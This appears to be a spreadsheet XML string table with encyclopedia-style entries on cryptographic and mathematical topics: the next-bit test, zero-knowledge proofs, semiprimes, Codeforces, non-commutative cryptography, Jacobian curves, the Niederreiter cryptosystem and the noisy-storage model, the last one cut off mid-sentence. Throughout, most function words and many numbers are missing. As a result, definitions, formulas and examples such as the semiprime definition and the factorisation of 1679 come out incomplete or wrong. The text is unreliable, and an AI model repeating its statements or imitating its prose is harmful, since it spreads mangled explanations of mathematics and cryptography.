families. {\displaystyle {\mathcal {m}}} distinguisher probabilistic version yao's test, i.e. probabilistic turing machine, running polynomial time, polynomial {\displaystyle infinitely many {\displaystyle {\displaystyle r_{k,i}=\{s_{1}\ldots s_{i}u_{i+1}\ldots u_{p(k)}|s\in s_{k},u\in \{0,1\}^{p(k)}\}} have: {\displaystyle r_{k,0}=\{0,1\}^{p(k)}} {\displaystyle r_{k,p(k)}=s_{k}} then, notice {\displaystyle \sum _{i=0}^{p(k)}|p_{k,r_{k,i+1}}^{\mathcal {m}}-p_{k,r_{k,i}}^{\mathcal {m}}|\geq |p_{k,r_{k,p(k)}}^{\mathcal {m}}-p_{k,r_{k,0}}^{\mathcal {m}}|=|p_{k,s}^{\mathcal {m}}-p_{k,u}^{\mathcal {m}}|\geq {\frac {1}{q(k)}}} therefore, least {\displaystyle |p_{k,r_{k,i+1}}^{\mathcal {m}}-p_{k,r_{k,i}}^{\mathcal {m}}|} smaller {\displaystyle {\frac {1}{q(k)p(k)}}} next, consider probability distributions {\displaystyle _{k,i}} {\displaystyle {\overline {\mu _{k,i}}}} {\displaystyle r_{k,i}} distribution {\displaystyle _{k,i}} probability distribution choosing {\displaystyle first bits {\displaystyle s_{k}} probability given {\displaystyle _{k}} {\displaystyle p(k)-i} remaining bits uniformly random. thus: thus {\displaystyle _{k,i}={\frac {1}{2}}(\mu _{k,i+1}+{\overline {\mu _{k,i+1}}})} simple calculus trick shows this), thus distributions {\displaystyle _{k,i+1}} {\displaystyle {\overline {\mu _{k,i+1}}}} distinguished {\displaystyle {\mathcal {m}}} without loss generality, assume {\displaystyle p_{\mu _{k,i+1}}^{\mathcal {m}}-p_{\overline {\mu _{k,i+1}}}^{\mathcal {m}}\geq {\frac {1}{2}}+{\frac {1}{r(k)}}} {\displaystyle polynomial. this gives possible construction turing machine solving next-bit test: upon receiving {\displaystyle first bits sequence, {\displaystyle {\mathcal {n}}} pads input guess {\displaystyle {\displaystyle p(k)-i-1} random bits, chosen uniform probability. then runs {\displaystyle {\mathcal {m}}} outputs {\displaystyle result {\displaystyle {\displaystyle 1-l} else. references</t>
  </si>
  <si>
    <t>Non-interactive zero-knowledge proof</t>
  </si>
  <si>
    <t>non-interactive zero-knowledge proofs zero-knowledge proofs interaction prover verifier simulated prover, making direct communication verifier unnecessary making proof generation possible off-line. subsequently proof sent verified also verifying simulation verifier done correctly. these cryptographic techniques seen interest blockchain applications recently, instantiations nizk, zk-snark, zk-stark. history blum, feldman, micali showed 1988 common reference string shared prover verifier sufficient achieve computational zero-knowledge without requiring interaction. goldreich oren gave impossibility results shot zero-knowledge protocols standard model. 2003, shafi goldwasser yael tauman kalai published instance identification scheme hash function yield insecure digital signature scheme. these results contradictory, impossibility result goldreich oren hold common reference string model random oracle model. non-interactive zero-knowledge proofs however show separation cryptographic tasks achieved standard model achieved 'more powerful' extended models.the model influences properties obtained zero-knowledge protocol. pass showed common reference string model non-interactive zero-knowledge protocols preserve properties interactive zero-knowledge protocols; e.g., preserve deniability. non-interactive zero-knowledge proofs also obtained random oracle model using fiat–shamir heuristic. 2012 article bitansky introduced acronym zk-snark zero-knowledge succinct non-interactive argument knowledge. first widespread application zk-snarks zerocash blockchain protocol, zero-knowledge cryptography provides computational backbone, facilitating mathematical proofs party possession certain information without revealing information is.in 2017, bulletproofs released, enable proving committed value range using logarithmic length range) number field group elements. bulletproofs later implemented mimblewimble protocol (the basis grin beam, litecoin extension blocks) monero cryptocurrency.in 2018, zk-stark (zero-knowledge scalable transparent argument knowledge) protocol introduced, offering transparency trusted setup), quasi-linear proving time, poly-logarithmic verification time. definition originally, non-interactive zero-knowledge defined single theorem proof system. system proof requires fresh common reference string. common reference string general random string. may, instance, consist randomly chosen group elements protocol parties use. although group elements random, reference string contains certain structure (e.g., group elements) distinguishable randomness. subsequently, feige, lapidot, shamir introduced multi-theorem zero-knowledge proofs versatile notion non-interactive zero knowledge proofs. pairing-based non-interactive proofs pairing-based cryptography several cryptographic advancements. advancements powerful efficient non-interactive zero-knowledge proofs. seminal idea hide values evaluation pairing commitment. using different commitment schemes, idea used build zero-knowledge proof systems sub-group hiding decisional linear assumption. these proof systems prove circuit satisfiability, thus cook–levin theorem allow proving membership every language size common reference string proofs relatively small; however, transforming statement boolean circuit incurs considerable overhead. proof systems sub-group hiding, decisional linear assumption, external diffie–hellman assumption allow directly proving pairing product equations common pairing-based cryptography proposed.under strong knowledge assumptions, known create sublinear-length computationally sound proof systems np-complete languages. more precisely, proof proof systems consists small number bilinear group elements. references</t>
  </si>
  <si>
    <t>Semiprime</t>
  </si>
  <si>
    <t>mathematics, semiprime natural number product exactly prime numbers. primes product equal other, semiprimes include squares prime numbers. because infinitely many prime numbers, also infinitely many semiprimes. semiprimes also called biprimes. examples variations semiprimes less are: semiprimes square numbers called discrete, distinct, squarefree semiprimes: semiprimes case {\displaystyle k=2} {\displaystyle -almost primes, numbers exactly {\displaystyle prime factors. however sources "semiprime" refer larger numbers, numbers prime factors (including unit (1), primes, semiprimes). these are: formula number semiprimes semiprime counting formula discovered noel panos 2005. {\displaystyle _{2}(n)} denote number semiprimes less equal then {\displaystyle (x)} prime-counting function {\displaystyle p_{k}} denotes prime. properties semiprime numbers composite numbers factors themselves. example, number semiprime factors composite. squarefree semiprime {\displaystyle n=pq} (with {\displaystyle p\neq value euler's totient function {\displaystyle \varphi (n)} (the number positive integers less equal {\displaystyle relatively prime {\displaystyle takes simple form this calculation important part application semiprimes cryptosystem. square semiprime {\displaystyle n=p^{2}} formula simple: applications semiprimes highly useful area cryptography number theory, notably public cryptography, used pseudorandom number generators blum blum shub. these methods rely fact finding large primes multiplying together (resulting semiprime) computationally simple, whereas finding original factors appears difficult. factoring challenge, security offered prizes factoring specific large semiprimes several prizes awarded. original factoring challenge issued 1991, replaced 2001 factoring challenge, later withdrawn 2007.in 1974 arecibo message sent radio signal aimed star cluster. consisted 1679 {\displaystyle 1679} binary digits intended interpreted {\displaystyle 23\times bitmap image. number 1679 {\displaystyle 1679=23\cdot chosen semiprime therefore arranged rectangular image distinct ways rows columns, rows columns). also chen's theorem references external links weisstein, eric "semiprime". mathworld.</t>
  </si>
  <si>
    <t>Codeforces</t>
  </si>
  <si>
    <t>codeforces website hosts competitive programming contests. maintained group competitive programmers itmo university mikhail mirzayanov. since 2013, codeforces claims surpass topcoder terms active contestants. 2018, 600,000 registered users. codeforces along similar websites used sport programmers like gennady korotkevich, petr mitrichev, benjamin makoto soejima, programmers interested furthering careers. overview codeforces platform typically used preparing competitive programming contests offers following features: short (2-hours) contests, called "codeforces rounds", held week educational contests (2-2.5 hours, hours hours round hacking period), held times month; challenge/hack contestants' solutions; solve problems previous contests training purposes; "polygon" feature creating testing problems; social networking internal public blogs. rating system contestants rated system similar rating system. there usually prizes winners, though several times year special contests held, performing contestants receive t-shirts. some bigger contests hosted codeforces base, among "the lyft level challenge 2018", provided lyft "microsoft coding contest summer 2018" provided microsoft.contestants divided ranks based ratings. since 2018, users ratings 1900 2099 rated div. div. contests. time, div. created users rated 1600. history codeforces codeforces created group competitive programmers saratov state university mike mirzayanov. originally created interested solving tasks taking part competitions. first codeforces round held february 2010 participants. july 2019 rounds held, 9000 registered competitors round average. before 2012 codeforces rounds titled "codeforces beta rounds" indicate system still development. academic codeforces recommended many universities. according daniel sleator, professor computer science carnegie mellon university, competitive programming valuable computer science education, competitors learn adapt classic algorithms problems, thereby improving understanding algorithmic concepts. used codeforces problems class, 15-295: competition programming problem solving. also codechef codefights facebook hacker google code hackerrank international collegiate programming contest online judge spoj topcoder online judge references external sources official website</t>
  </si>
  <si>
    <t>Non-commutative cryptography</t>
  </si>
  <si>
    <t>non-commutative cryptography area cryptology cryptographic primitives, methods systems based algebraic structures like semigroups, groups rings non-commutative. earliest applications non-commutative algebraic structure cryptographic purposes braid groups develop cryptographic protocols. later several non-commutative structures like thompson groups, polycyclic groups, grigorchuk groups, matrix groups identified potential candidates cryptographic applications. contrast non-commutative cryptography, currently widely used public-key cryptosystems like cryptosystem, diffie–hellman exchange elliptic curve cryptography based number theory hence depend commutative algebraic structures. non-commutative cryptographic protocols developed solving various cryptographic problems like exchange, encryption-decryption, authentication. these protocols similar corresponding protocols commutative case. some non-commutative cryptographic protocols protocols would assumed non-abelian group. elements notation would indicate element a−1wa. protocols exchange protocol lee, following protocol lee, al., establishes common secret alice bob. element published. subgroups published. alice chooses element sends bob. alice keeps private. chooses element sends alice. keeps private. alice computes (wb)a wba. computes (wa)b=wab. since alice share common secret anshel-anshel-goldfeld protocol this exchange protocol using non-abelian group significant require commuting subgroups case protocol lee, elements selected published. alice picks private word alice sends b1x, b2x, bob. picks private word sends a1y, a2y, alice. alice share common secret x−1y−1xy. alice computes a1y, a2y, pre-multiplying x−1, alice gets computes b1x, b2x, bmx) x−1yx. pre-multiplying taking inverse, gets stickel's exchange protocol original formulation protocol group used group invertible matrices finite field. public non-abelian finite group. public elements orders respectively. alice chooses random numbers sends ambn bob. picks random numbers sends arbs alice. common shared alice alice computes amvbn. computes arubs. protocols encryption decryption this protocol describes encrypt secret message decrypt using non-commutative group. alice want send secret message bob. non-commutative group. public subgroups element chosen published. chooses secret publishes public key. alice chooses random computes encrypted message (xr, h(t) {\displaystyle \oplus hash function {\displaystyle \oplus denotes operation. alice sends bob. decrypt recovers follows: (xr)b (xb)r plain text message send alice h(t) {\displaystyle \oplus {\displaystyle \oplus h(t) protocols authentication want check whether sender message really alice. non-commutative group subgroups element selected published. alice chooses private publishes pair chooses sends challenge alice. alice sends response bob. checks true, identity alice established. security basis protocols basis security strength various protocols presented difficulty following problems: conjugacy decision problem (also called conjugacy problem): given elements group determine whether exists element conjugacy search problem: given elements group find element ux.if algorithm known solve conjugacy search problem, function considered one-way function. platform groups non-commutative group used particular cryptographic protocol called platform group protocol. only groups certain properties used platform groups implementation non-commutative cryptographic protocols. group suggested platform group certain non-commutative cryptographic system. following list properties expected group must well-known well-studied. word problem fast solution deterministic algorithm. there efficiently computable "normal form" elements impossible recover factors product number elements length grow faster polynomial (here "length length word representing group element.) examples platform groups braid groups positive integer. braid group group generated xn-1 following presentation: {\displaystyle b_{n}=\left\langle x_{1},x_{2},\ldots ,x_{n-1}{\big |}x_{i}x_{j}=x_{j}x_{i}{\text{ }}|i-j|&gt;1{\text{ }}x_{i}x_{j}x_{i}=x_{j}x_{i}x_{j}{\text{ }}|i-j|=1\right\rangle thompson's group thompson's group infinite group following infinite presentation: {\displaystyle f=\left\langle x_{0},x_{1},x_{2},\ldots {\big |}x_{k}^{-1}x_{n}x_{k}=x_{n+1}{\text{ }}k&lt;n\right\rangle grigorchuk's group denote infinite rooted binary tree. vertices finite binary sequences. a(t) denote automorphisms automorphism permutes vertices preserving connectedness.) grigorchuk's group subgroup a(t) generated automorphisms defined follows: {\displaystyle a(b_{1},b_{2},\ldots ,b_{n})=(1-b_{1},b_{2},\ldots ,b_{n})} {\displaystyle b(b_{1},b_{2},\ldots ,b_{n})={\begin{cases}(b_{1},1-b_{2},\ldots ,b_{n})&amp;{\text{ }}b_{1}=0\\(b_{1},c(b_{2},\ldots ,b_{n}))&amp;{\text{ }}b_{1}=1\end{cases}}} {\displaystyle c(b_{1},b_{2},\ldots ,b_{n})={\begin{cases}(b_{1},1-b_{2},\ldots ,b_{n})&amp;{\text{ }}b_{1}=0\\(b_{1},d(b_{2},\ldots ,b_{n}))&amp;{\text{ }}b_{1}=1\end{cases}}} {\displaystyle d(b_{1},b_{2},\ldots ,b_{n})={\begin{cases}(b_{1},b_{2},\ldots ,b_{n})&amp;{\text{ }}b_{1}=0\\(b_{1},b(b_{2},\ldots ,b_{n}))&amp;{\text{ }}b_{1}=1\end{cases}}} artin group artin group a(γ) group following presentation: {\displaystyle a(\gamma )=\left\langle a_{1},a_{2},\ldots ,a_{n}|\mu _{ij}=\mu _{ji}{\text{ }}1\leq i&lt;j\leq n\right\rangle {\displaystyle _{ij}=a_{i}a_{j}a_{i}\ldots {\displaystyle m_{ij}} factors) {\displaystyle m_{ij}=m_{ji}} matrix groups finite field. groups matrices used platform groups certain non-commutative cryptographic protocols. semidirect products also group-based cryptography further reading alexei myasnikov; vladimir shpilrain; alexander ushakov (2008). group-based cryptography. berlin: birkhäuser verlag. zhenfu (2012). directions modern cryptography. boca raton: press, taylor francis group. isbn 978-1-4665-0140-9. benjamin fine; (2011). "aspects nonabelian group based cryptography: survey open problems". arxiv:1103.4093 [cs.cr]. alexei myasnikov; vladimir shpilrain; alexander ushakov (2011). non-commutative cryptography complexity group-theoretic problems. american mathematical society. isbn 9780821853603. references</t>
  </si>
  <si>
    <t>Jacobian curve</t>
  </si>
  <si>
    <t>mathematics, jacobi curve representation elliptic curve different usual defined weierstrass equation. sometimes used cryptography instead weierstrass form provide defence simple differential power analysis style (spa) attacks; possible, indeed, general addition formula also doubling point elliptic curve form: operations become indistinguishable side-channel information. jacobi curve also offers faster arithmetic compared weierstrass curve. jacobi curve types: jacobi intersection, given intersection surfaces, jacobi quartic. elliptic curves: basics given elliptic curve, possible "operations" points: example points obtaining point belongs curve given point elliptic curve, possible "double" means find [2]p (the square brackets used indicate [n]p, point added times), also find negation means find way, points elliptic curve forms group. note identity element group operation point affine plane, appears projective coordinates: "point infinity", neutral element group law. adding doubling formulas useful also compute [n]p, n-th multiple point elliptic curve: operation considered elliptic curve cryptography. elliptic curve field weierstrass form what importance later point order [2]p point order generally points order correspond roots polynomial f(x) from ea,b denote elliptic curve weierstrass form ea,b cubic polynomial three distinct roots write ea,b legendre normal form: ea,b: 1)(x j)in case three points order two: (–1, (–j, case notation e[j]. note expressed terms definition: jacobi intersection elliptic curve p3(k) represented intersection quadric surfaces: {\displaystyle q:\{q_{1}(x_{0},x_{1},x_{2},x_{3})=0\}\cap \{q_{2}(x_{0},x_{1},x_{2},x_{3})=0\}} possible define jacobi form elliptic curve intersection quadrics. ea,b elliptic curve weierstrass form, apply following {\displaystyle \phi :(x,y)\mapsto (x,y,z,t)=(x,y,1,x^{2})} following system equations holds: {\displaystyle \mathbf :{\begin{cases}x^{2}-tz=0\\y^{2}-axz-bz^{2}-tx=0\end{cases}}} curve e[j] corresponds following intersection surfaces p3(k): {\displaystyle \mathbf 1:{\begin{cases}x^{2}+y^{2}-t^{2}=0\\kx^{2}+z^{2}-t^{2}=0\end{cases}}} .the "special case", e[0], elliptic curve double point thus singular. obtained applying e[j] transformation: e[j] {\displaystyle (x,y)\mapsto (x,y,z,t)=(-2y,x^{2}-j,x^{2}+2jx+j,x^{2}+2x+j)} {\displaystyle o=(0:1:0)\mapsto (0,1,1,1)} group neutral element group point image addition doubling given (x1, (x2, t2), points coordinates point are: {\displaystyle x_{3}=t_{1}y_{2}x_{1}z_{2}+z_{1}x_{2}y_{1}t_{2}} {\displaystyle y_{3}=t_{1}y_{2}y_{1}t_{2}-z_{1}x_{2}x_{1}z_{2}} {\displaystyle z_{3}=t_{1}z_{1}t_{2}z_{2}-kx_{1}y_{1}x_{2}y_{2}} {\displaystyle t_{3}=(t_{1}y_{2})^{2}+(z_{1}x_{2})^{2}} these formulas also valid doubling: sufficies adding doubling points operations require multiplications plus multiplication constant (k). also possible following formulas doubling point find [2]p1: {\displaystyle x_{3}=2y_{1}t_{1}z_{1}x_{1}} {\displaystyle y_{3}=(t_{1}y_{1})^{2}-(t_{1}z_{1})^{2}+(z_{1}y_{1})^{2}} {\displaystyle z_{3}=(t_{1}z_{1})^{2}-(t_{1}y_{1})^{2}+(z_{1}y_{1})^{2}} {\displaystyle t_{3}=(t_{1}z_{1})^{2}+(t_{1}y_{1})^{2}-(z_{1}y_{1})^{2}} using formulas multiplications needed double point. however, even efficient “strategies” doubling require multiplications. possible triple point multiplications; indeed [3]p1 obtained adding [2]p1 cost multiplications [2]p1 [2]p1 example addition doubling consider case: {\displaystyle \mathbf 1:{\begin{cases}x^{2}+y^{2}-t^{2}=0\\4x^{2}+z^{2}-t^{2}=0\end{cases}}} consider points {\displaystyle p_{1}=(1,{\sqrt {3}},0,2)} {\displaystyle p_{2}=(1,2,1,{\sqrt {5}})} easy verify belong sufficient points satisfy equations system s1). using formulas given adding points, coordinates are: {\displaystyle x_{3}=t_{1}y_{2}x_{1}z_{2}+z_{1}x_{2}y_{1}t_{2}=4} {\displaystyle y_{3}=t_{1}y_{2}y_{1}t_{2}-z_{1}x_{2}x_{1}z_{2}=4{\sqrt {15}}} {\displaystyle z_{3}=t_{1}z_{1}t_{2}z_{2}-kx_{1}y_{1}x_{2}y_{2}=-8{\sqrt {3}}} {\displaystyle t_{3}=(t_{1}y_{2})^{2}+(z_{1}x_{2})^{2}=16} resulting point {\displaystyle p_{3}=(4,4{\sqrt {15}},-8{\sqrt {3}},16)} with formulas given doubling, possible find point [2]p1: {\displaystyle x_{3}=2y_{1}t_{1}z_{1}x_{1}=0} {\displaystyle y_{3}=(t_{1}y_{1})^{2}-(t_{1}z_{1})^{2}+(z_{1}y_{1})^{2}=12} {\displaystyle z_{3}=(t_{1}z_{1})^{2}-(t_{1}y_{1})^{2}+(z_{1}y_{1})^{2}=-12} {\displaystyle t_{3}=(t_{1}z_{1})^{2}+(t_{1}y_{1})^{2}-(z_{1}y_{1})^{2}=12} case [2]p1 –12, 12). negation given point (x1, negation (−x1, addition doubling affine coordinates given affine points (x1, (x2, z2), point coordinates: {\displaystyle x_{3}={\frac {y_{2}x_{1}z_{2}+z_{1}x_{2}y_{1}}{(y_{2}^{2}+(z_{1}x_{2})^{2})}}} {\displaystyle y_{3}={\frac {y_{2}y_{1}-z_{1}x_{2}x_{1}z_{2}}{(y_{2}^{2}+(z_{1}x_{2})^{2})}}} {\displaystyle z_{3}={\frac {z_{1}z_{2}-ax_{1}y_{1}x_{2}y_{2}}{(y_{2}^{2}+(z_{1}x_{2})^{2})}}} these formulas valid also doubling condition extended coordinates there another kind coordinate system point jacobi intersection represented. given following elliptic curve jacobi intersection form: {\displaystyle \mathbf 1:{\begin{cases}x^{2}+y^{2}=1\\kx^{2}+z^{2}=1\end{cases}}} extended coordinates describe point variables where: {\displaystyle x=x/t} {\displaystyle y=y/t} {\displaystyle z=z/t} {\displaystyle xy=x\cdot {\displaystyle zt=z\cdot sometimes coordinates used, convenient terms time-cost) specific situations. information operations based coordinates http://hyperelliptic.org/efd/g1p/auto-jintersect-extended.html definition: jacobi quartic elliptic curve jacobi quartic form obtained curve ea,b weierstrass form least point order following transformation sends point ea,b point jacobi coordinates, (sx: s2y: sz). ea,b {\displaystyle (p,0)\mapsto (0:-1:1)} {\displaystyle (x,y)\neq (p,0)\mapsto (2(x-p):(2x+p)(x-p)^{2}-y^{2}:y)} {\displaystyle o\mapsto (0:1:1)} applying ea,b, obtains curve following form: {\displaystyle y^{2}=ex^{4}-2dx^{2}z^{2}+z^{4}} where: {\displaystyle e={\frac {-(3p^{2}+4a)}{16}},\ d={\frac {3p}{4}}} .are elements represents elliptic curve jacobi quartic form, jacobi coordinates. jacobi quartic affine coordinates general form jacobi quartic curve affine coordinates {\displaystyle y^{2}=ex^{4}+2ax^{2}+1} ,where often assumed. group neutral element group projective point addition doubling affine coordinates given affine points {\displaystyle p_{1}=(x_{1},y_{1})} {\displaystyle p_{2}=(x_{2},y_{2})} point {\displaystyle p_{3}=(x_{3},y_{3})} that: {\displaystyle x_{3}={\frac {x_{1}y_{2}+y_{1}x_{2}}{1-e(x_{1}x_{2})^{2}}}} {\displaystyle y_{3}={\frac {((1+e(x_{1}x_{2})^{2})(y_{1}y_{2}+2ax_{1}x_{2})+2ex_{1}x_{2}({x_{1}}^{2}+{x_{2}}^{2}))}{(1-e(x_{1}x_{2})^{2})^{2}}}} jacobi intersections, also case possible formula doubling well. addition doubling projective coordinates given points (x1: (x2: coordinates point (x3: z3), given terms formulae: {\displaystyle x_{3}=x_{1}z_{1}y_{2}+y_{1}x_{2}z_{2}} {\displaystyle y_{3}=\left(z_{1}^{2}z_{2}^{2}+ex_{1}^{2}x_{2}^{2}\right)\left(y_{1}y_{2}-2ax_{1}x_{2}z_{1}z_{2}\right)\ 2ex_{1}x_{2}z_{1}z_{2}\left(x_{1}^{2}z_{2}^{2}+z_{1}^{2}x_{2}^{2}\right)} {\displaystyle z_{3}=z_{1}^{2}z_{2}^{2}-ex_{1}^{2}x_{2}^{2}} formula also doubling, condition point [2]p1 obtained. number multiplications required points plus multiplications constants: particular multiplications constant constant there "strategies" reduce operations required adding doubling points: number multiplications decreased plus multiplications constants (see section details). number multiplications reduced working constants elliptic curve jacobi form modified order smaller number operations adding doubling. example, constant significantly small, multiplication cancelled; however best option reduce small, one, multiplications neglected. example addition doubling consider elliptic curve e4,0, point order therefore, associated jacobi quartic form {\displaystyle y^{2}=x^{4}+z^{4}} choosing points {\displaystyle p_{1}=(1:{\sqrt {2}}:1)} {\displaystyle p_{2}=(2:{\sqrt {17}}:1)} possible find using formulae adding given above: {\displaystyle x_{3}=1\cdot 1\cdot {\sqrt {17}}+{\sqrt {2}}\cdot 2\cdot 1={\sqrt {17}}+2{\sqrt {2}}} {\displaystyle y_{3}=\left(1^{2}\cdot 1^{2}+1\cdot 1^{2}\cdot 2^{2}\right)\left({\sqrt {2}}\cdot {\sqrt {17}}-2\cdot 0\cdot 1\cdot 2\cdot 1\cdot 1\right)+2\cdot 1\cdot 1\cdot 2\cdot 1\cdot 1\left(1^{2}\cdot 1^{2}+1^{2}\cdot 2^{2}\right)=5{\sqrt {34}}+20} {\displaystyle z_{3}=1^{2}\cdot 1^{2}-1\cdot 1^{2}\cdot 2^{2}=-3} {\displaystyle p_{3}=({\sqrt {17}}+2{\sqrt {2}}:5{\sqrt {34}}+20:-3)} .using formulae, point [2]p1 obtained: {\displaystyle x_{3}=1\cdot 1\cdot {\sqrt {2}}+{\sqrt {2}}\cdot 1\cdot 1=2{\sqrt {2}}} {\displaystyle y_{3}=\left(1+1\cdot 1\right)\left({\sqrt {2}}\cdot {\sqrt {2}}-2\cdot 0\cdot 1\cdot 1\cdot 1\cdot 1\right)+2\cdot 1\left(1^{2}\cdot 1^{2}+1^{2}\cdot 1^{2}\right)=8} {\displaystyle z_{3}=1^{2}\cdot 1^{2}-1\cdot 1^{2}\cdot 1^{2}=0} {\displaystyle p_{4}=(2{\sqrt {2}}:8:0)} negation negation point (x1: (−x1: alternative coordinates jacobi quartic there systems coordinates used represent point jacobi quartic: used obtain fast computations certain cases. information time-cost required operations coordinates http://hyperelliptic.org/efd/g1p/auto-jquartic.html given affine jacobi quartic {\displaystyle y^{2}=x^{4}+2ax^{2}+1} doubling-oriented xxyzz coordinates introduce additional curve parameter satisfying represent point that: {\displaystyle x=x/z} {\displaystyle y=y/zz} {\displaystyle xx=x^{2}} {\displaystyle zz=z^{2}} {\displaystyle r=2\cdot x\cdot doubling-oriented coordinates, additional assumption represent point satisfying following equations: {\displaystyle x=x/z} {\displaystyle y=y/z^{2}} using xxyzz coordinates additional assumption, represent point that: {\displaystyle x=x/z} {\displaystyle y=y/zz} {\displaystyle xx=x^{2}} {\displaystyle zz=z^{2}} xxyzzr coordinates represent that: {\displaystyle x=x/z} {\displaystyle y=y/zz} {\displaystyle xx=x^{2}} {\displaystyle zz=z^{2}} {\displaystyle r=2\cdot x\cdot coordinates point given with: {\displaystyle x=x/z} {\displaystyle y=y/z^{2}} also information running-time required specific case, table costs operations elliptic curves. notes references olivier billet, marc joye (2003). "the jacobi model elliptic curve side-channel analysis". jacobi model elliptic curve side-channel analysis. lecture notes computer science. vol. 2643. springer-verlag berlin heidelberg 2003. 34–42. doi:10.1007/3-540-44828-4_5. isbn 978-3-540-40111-7. p.y. liardet, n.p. smart (2001). "preventing spa/dpa systems using jacobi form". cryptographic hardware embedded systems ches 2001. lecture notes computer science. vol. 2162. springer-verlag berlin heidelberg 2001. 391–401. doi:10.1007/3-540-44709-1_32. isbn 978-3-540-42521-2. http://hyperelliptic.org/efd/index.html external links http://hyperelliptic.org/efd/g1p/index.html</t>
  </si>
  <si>
    <t>Niederreiter cryptosystem</t>
  </si>
  <si>
    <t>cryptography, niederreiter cryptosystem variation mceliece cryptosystem developed 1986 harald niederreiter. applies idea parity check matrix, linear code. niederreiter equivalent mceliece security point view. uses syndrome ciphertext message error pattern. encryption niederreiter times faster encryption mceliece. niederreiter used construct digital signature scheme. scheme definition special case niederreiter's original proposal broken system secure used binary goppa code. generation alice selects binary k)-linear goppa code, capable correcting errors. this code possesses efficient decoding algorithm. alice generates parity check matrix, code, alice selects random binary non-singular matrix, alice selects random permutation matrix, alice computes matrix, hpub shp. alice's public (hpub, private message encryption suppose wishes send message, alice whose public (hpub, encodes message, binary string length weight computes ciphertext hpubet. message decryption upon receipt hpubmt bob, alice following retrieve message, alice computes s−1c hpmt. alice applies syndrome decoding algorithm recover pmt. alice computes message, p−1pmt. signature scheme courtois, finiasz sendrier showed niederreiter cryptosystem used derive signature scheme hash document, signed (with public hash algorithm). decrypt hash value instance ciphertext. append decrypted message document signature.verification applies public encryption function signature checks whether equals hash value document. when using niederreiter, fact cryptosystem based error correcting codes, second step signature scheme almost always fails. this random syndrome usually corresponds error pattern weight greater system specifies deterministic tweaking found decrypted. choice code parameters related probability random syndrome decodable. courtois, finiaz, sendrier suggest parameter values then probability decode random syndrome {\displaystyle {\frac {1}{9!}}} therefore, decodable syndrome found expected number attempts. counter, original document produce slightly altered document, hashing gives syndrome depends first value decodable. case decrypted message word, length weight equals hash value di0. signature combined value verification. this signature attached original document, references henk tilborg. fundamentals cryptology, 11.4. external links attacking defending mceliece cryptosystem daniel bernstein tanja lange christiane peters</t>
  </si>
  <si>
    <t>Noisy-storage model</t>
  </si>
  <si>
    <t>noisy-storage model refers cryptographic model employed quantum cryptography. assumes quantum memory device attacker (adversary) trying break protocol imperfect (noisy). main goal model enable secure implementation two-party cryptographic primitives, commitment, oblivious transfer secure identification. motivation quantum communication proven extremely useful comes distributing encryption keys. allows distant parties alice expand small initial secret arbitrarily long secret sending qubits (quantum bits) other. most importantly, shown eavesdropper trying listen communication cannot intercept information long key. this known quantum distribution (qkd). yet, shown even quantum communication allow secure implementation many two-party cryptographic tasks. these form instances secure function evaluation. example oblivious transfer. what sets tasks apart distribution solve problems parties, alice bob, trust other. that outside party like eavesdropper, alice bob. intuitively, lack trust makes problem hard. unlike quantum distribution, alice cannot collaborate detect eavesdropping activity. instead, party fend himself. since tasks like secure identification practical interest, willing make assumptions powerful adversary security holds long assumptions satisfied. classical cryptography, i.e., without quantum tools, computational assumptions. such assumptions consists parts. first, assumes particular problem difficult solve. example, might assume hard factor large integer prime factors (e.g. 15=5x3). second, assumes adversary limited amount computing power, namely less (thought required solve chosen problem. bounded storage information theoretic cryptography physical assumptions appear, rely hardness assumptions, merely assume limit resource. classical cryptography, bounded-storage model introduced ueli maurer assumes adversary store certain number classical bits. protocols known principle) allow secure implementation cryptographic task long adversary's storage small. very intuitively, security becomes possible assumption since adversary make choice information keep. that protocol effectively overflows memory device leading inevitable lack information adversary. later discovered classical protocol requires honest parties store {\displaystyle bits order execute successfully broken adversary store {\displaystyle o(n^{2})} bits. that required execute protocol, required break security relatively small. bounded quantum storage this changes dramatically using quantum communication that alice send qubits part protocol. likewise, assumes adversary's quantum storage limited certain number qubits. there restriction many classical bits adversary store. this known bounded-quantum-storage model. shown exist quantum protocols honest parties need quantum storage execute them, nevertheless secure long alice transmits twice number qubits adversary store. noisy storage more generally, security possible long amount information adversary store memory device limited. this intuition captured noisy-storage model, includes bounded-quantum-storage model special case. such limitation can, example, come memory device extremely large, imperfect. information theory imperfect memory device also called noisy channel. motivation general model threefold. first, allows make statements much general memory devices adversary available. second, security statements could made signals transmitted, storage device itself, uses continuous variables whose dimension infinite thus cannot captured bounded storage assumption without additional constraints. third, even dimension signals small, noisy-storage analysis allows security beyond regime bounded-storage make security statement. example, storage channel entanglement breaking, security possible even storage device arbitrarily large (i.e., bounded way). assumption assumption noisy-storage model waiting times {\displaystyle \delta introduced protocol, adversary store quantum information noisy memory device. such device simply quantum channel {\displaystyle {\mathcal {f}}:{\mathcal {s}}({\mathcal {h}}_{\rm {in}})\rightarrow {\mathcal {s}}({\mathcal {h}}_{\rm {out}})} takes input states {\displaystyle \rho _{\rm {in}}\in {\mathcal {s}}({\mathcal {h}}_{\rm {in}})} noisy output states {\displaystyle \rho _{\rm {out}}\in {\mathcal {s}}({\mathcal {h}}_{\rm {out}})} otherwise, adversary powerful. example, store unlimited amount classical information perform computation instantaneously. latter assumption also implies perform form error correcting encoding using noisy memory device, even computationally difficult (i.e., requires long time). context, generally referred encoding attack {\displaystyle {\mathcal {e}}} decoding attack {\displaystyle {\mathcal {d}}} since adversary's classical memory arbitrarily large, encoding {\displaystyle {\mathcal {e}}} generate quantum state input storage device {\displaystyle {\mathcal {f}}} also output classical information. adversary's decoding attack {\displaystyle {\mathcal {d}}} make extra classical information, well additional information adversary gain waiting time passed. practise, often considers storage devices consist {\displaystyle memory cells, subject noise. information-theoretic terms, means device form {\displaystyle {\mathcal {f}}={\mathcal {n}}^{\otimes {\displaystyle {\mathcal {n}}:s(\mathbb ^{d})\rightarrow s(\mathbb ^{d})} noisy quantum channel acting memory cell dimension {\displaystyle examples storage device consists {\displaystyle qubits, subject depolarizing noise. that {\displaystyle {\mathcal {f}}={\mathcal {n}}^{\otimes {\displaystyle {\mathcal {n}}(\rho )=\lambda \rho +(1-\lambda ){\mathsf {id}}/2} 2-dimensional depolarizing channel. storage device consists {\displaystyle qubits, noise-free. this corresponds special case bounded-quantum-storage. that {\displaystyle {\mathcal {f}}={\mathsf {id}}^{\otimes {\displaystyle {\mathsf {id}}} identity channel. protocols most protocols proceed steps. first, alice exchange {\displaystyle qubits encoded three mutually unbiased bases. these encodings used bb84 six-state protocols quantum distribution. typically, takes form alice sending qubits bob, 